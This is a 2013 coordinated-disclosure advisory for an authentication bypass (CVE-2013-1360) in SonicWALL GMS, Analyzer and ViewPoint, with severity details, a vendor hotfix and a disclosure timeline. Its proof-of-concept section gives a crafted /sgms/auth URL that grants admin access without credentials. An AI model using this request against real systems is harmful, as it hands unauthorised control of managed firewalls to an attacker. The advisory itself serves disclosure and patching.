Skip to content
cyberexploits
webappmultipletext

SonicWALL GMS/Viewpoint/Analyzer - Authentication Bypass

SonicWALL GMS/Viewpoint/Analyzer - Authentication Bypass

Published on 2013-01-18

Source code

Pinned to commit 7eac4c3a2ce5
textplatforms/multiple/webapps/24203.txt7eac4c3a
raw
-------------------------- NSOADV-2013-002 ---------------------------



SonicWALL GMS/Viewpoint/Analyzer Authentication Bypass (/sgms/)

______________________________________________________________________

______________________________________________________________________



                               111101111

                        11111 00110 00110001111

                   111111 01 01 1 11111011111111

                11111  0 11 01 0 11 1 1  111011001

             11111111101 1 11 0110111  1    1111101111

           1001  0 1 10 11 0 10 11 1111111  1 111 111001

         111111111 0 10 1111 0 11 11 111111111 1 1101 10

        00111 0 0 11 00 0 1110 1 1011111111111 1111111 11  100

       10111111 0 01 0  1 1 111110 11 1111111111111  11110000011

       0111111110 0110 1110 1 0 11101111111111111011 11100  00

       01111 0 10 1110 1 011111 1 111111111111111111111101 01

       01110 0 10 111110 110 0 11101111111111111111101111101

      111111 11 0 1111 0 1 1 1 1 111111111111111111111101 111

      111110110 10 0111110 1 0 0 1111111111111111111111111 110

    111 11111 1  1 111 1   10011 101111111111011111111 0   1100

   111 10  110 101011110010   11111111111111111111111 11 0011100

   11 10     001100     0001      111111111111111111 10 11 11110

  11110       00100      00001     10 1  1111  101010001 11111111

  11101        0  1011     10000    00100 11100        00001101 0

  0110         111011011             0110   10001        101 11110

  1011                 1             10 101   000001        01   00

   1010 1                              11001      1 1        101  10

      110101011                          0 101                 11110

            110000011

                      111

______________________________________________________________________

______________________________________________________________________



  Title:                  SonicWALL GMS/Viewpoint/Analyzer

                          Authentication Bypass (/sgms/)

  Severity:               Critical

  CVE-ID:                 CVE-2013-1360

  CVSS Base Score:        9

   Impact:                8.5

   Exploitability:        10

   CVSS2 Vector:          AV:N/AC:L/Au:N/C:P/I:P/A:C

  Advisory ID:            NSOADV-2013-002

  Found Date:             2012-04-26

  Date Reported:          2012-12-13

  Release Date:           2013-01-17

  Author:                 Nikolas Sotiriu

  Website:                http://sotiriu.de

  Twitter:                http://twitter.com/nsoresearch

  Mail:                   nso-research at sotiriu.de

  URL:                    http://sotiriu.de/adv/NSOADV-2013-002.txt

  Vendor:                 DELL SonicWALL (http://www.sonicwall.com/)

  Affected Products:      GMS

                          Analyzer

                          UMA

                          ViewPoint

  Affected Platforms:     Windows/Linux

  Affected Versions:      GMS/Analyzer/UMA 7.0.x

                          GMS/ViewPoint/UMA 6.0.x

                          GMS/ViewPoint/UMA 5.1.x

                          GMS/ViewPoint 5.0.x

                          GMS/ViewPoint 4.1.x

  Remote Exploitable:     Yes

  Local Exploitable:      No

  Patch Status:           Vendor released a patch (See Solution)

  Discovered by:          Nikolas Sotiriu







Background:

===========



The SonicWALL® Global Management System (GMS) provides organizations,

distributed enterprises and service providers with a powerful and

intuitive solution to centrally manage and rapidly deploy SonicWALL

firewall, anti-spam, backup and recovery, and secure remote access

solutions. Flexibly deployed as software, hardware, or a virtual

appliance, SonicWALL GMS offers centralized real-time monitoring, and

comprehensive policy and compliance reporting. For enterprise customers,

SonicWALL GMS streamlines security policy management and appliance

deployment, minimizing administration overhead. Service Providers can

use GMS to simplify the security management of multiple clients and

create additional revenue opportunities. For added redundancy and

scalability, GMS can be deployed in a cluster configuration.



(Product description from Website)







Description:

============



DELL SonicWALL GMS/Analyzer/ViewPoint contains a vulnerability that

allows an unauthenticated, remote attacker to bypass the Web interface

authentication offered by the affected product.



The vulnerability is attributed to a broken session handling in the

process of password change process of the web application.

changing in the web application.



An attacker may exploit this vulnerability by sending a specially

crafted request to the SGMS Interface (/sgms/).



The attacker gains full administrative access to the interface and

full control over all managed appliances, which could lead to a full

compromisation of the organisation.







Proof of Concept :

==================



Access the following URL to login to the sgms interface:



http://host/sgms/auth?clientHash=765c5e5b571050030b63666663383064663

83761376339303932346163656262&clientHash2=03196ba18cffc80df87a7c9092

4acebb&changePassword=1&user=admin&ctlSGMSDomainId=DMN00000000000000

00000000001



If the Console is not directly shown, type any password you

want in the change password dialog twice and hit submit to login.



Maybe you need to access the following URL after this process:



http://host/sgms/auth







Solution:

=========



Install Hotfix 125076.77. (Download from www.mysonicwall.com)







Disclosure Timeline:

====================



2012-04-26: Vulnerability found

2012-12-12: Sent the notification and disclosure policy and asked

            for a PGP Key (security@sonicwall.com)

2012-12-13: Sent advisory, disclosure policy and planned disclosure

            date (2012-12-28) to vendor

2012-12-18: SonicWALL analyzed the finding and wishes to delay the

            release to the 3. calendar week 2013.

2012-12-18: Changed release date to 2013-01-17.

2012-12-20: Patch is published

2013-01-17: Release of this advisory
View on GitHub